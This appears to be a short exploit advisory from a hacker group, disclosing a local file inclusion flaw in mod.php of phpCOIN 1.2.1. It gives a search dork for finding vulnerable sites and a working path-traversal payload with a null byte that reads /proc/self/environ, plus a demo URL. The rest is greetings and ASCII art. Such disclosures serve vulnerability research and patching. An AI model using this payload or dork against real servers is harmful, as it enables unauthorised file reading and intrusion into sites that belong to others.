# Exploit Title: phpCOIN 1.2.1 (mod.php) LFI vulnerability
# Author: _mlk_
# Software Link: null
# Version: phpCOIN 1.2.1
# Tested on: Linux*,*BSD and *windows
# Code : on paper
phpCOIN 1.2.1 (mod.php) Local File Inclusion Vulnerability
#############################################################################################################
# #
# [+] Discovered by : _mlk_ #
# #
# [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs #
# #
# [+] Sites : http://code.google.com/p/bugsec/ #
# http://botecounix.com.br/blog/ #
# http://c0d3rs.wordpress.com/ #
# #
#############################################################################################################
# #
# [-] Information #
# #
# [+] Script : phpCOIN 1.2.1 #
# #
# [+] Language : PHP #
# #
# [+] Vendor : http://www.phpcoin.com/ #
# #
# [+] Dork/String : "Powered By phpCOIN v1.2.1" / "mod.php?mod=faq" #
# #
# [+] Date : 02/03/10 (Brazil) #
# #
#############################################################################################################
# #
# [*] Example : #
# #
# http://localhost/[PATH]/mod.php?mod=[LFI]%00#
# http://localhost/mod.php?mod=[LFI]%00#
# #
# #
# --------------------------------------------------------------------------------------- #
# #
# #
# [*] Exploit : #
# #
# /../../../../../../proc/self/environ%00 #
# /proc/self/environ%00 #
# #
# #
# --------------------------------------------------------------------------------------- #
# #
# #
# [*] Demo : #
# #
# http://server/phpcoin/mod.php?mod=/../../../../../../proc/self/environ%00 #
# #
# #
#############################################################################################################
# #
# _\|/_ Greetz : #
# #
# Cooler_ , m0nad , i4k , F10N4 , dr4k3 , m1cr0n , l4rt , sh0rtkiller , hox , d4m4g3 , M0nt3r , #
# and all my friends emos ... xD #
# #
#############################################################################################################
,, ,,
((((( )))))
(((((( ))))))
(((((( Overflow ))))))
(((((,e@@@@@@@@@@e,)))))
(((@@@@@@@@@@@@@@@@))) BUGSEC TEAM
\@@/,:::,\/,:::,\@@/
/@@@|:::::||:::::|@@@\
/ @@@\':::'/\':::'/@@@ \
/ /@@@@@@@//\\@@@@@@@\ \
( / '@@@@@@@@@@@@@@' \ )
\( / \ )/
\ ( ) / ('-.)' [Ruby](`'.) '
\ / ('-.)' (`'.)[ASM] '('-.)'
. ' . ('-.)' (`'.) '('-.)' (`'.) '
' .( '.) '[Flex+bison]('-.)' (`'.) '('-.)' (`'.) '
_ ('-.)' (`'.) '('-.)' (`'.) '('-.)'[Emacs] (`'.) (`'.) ''
|0|=======- -(. ')`[VIM]( .-`)(`'.) ',(-')'('-.)' (`'.) (`'.) '
.--`+'--. . (' -,).(') .('-.)' (`'.) '('-.)' (`'.)(`'.) [Python]' '
|`-----'| (' .) - ('. )[Perl]('-.)' (`'.) '('-.)' (`'.) '(`'.) '
| | . ('[PHP] `. )('-.)' (`'.)[REGEX] '('-.)' (`'.) '
| === | ` . `('-.)'[C/C++] (`'.) ('-.)' (`'.) ''
|BugSec | ('-.)' (`'.) '('-.)[AWK]' (`'.) '
| --- |
| | Art by Cooler_
| GDB |
| |
`-.___.-'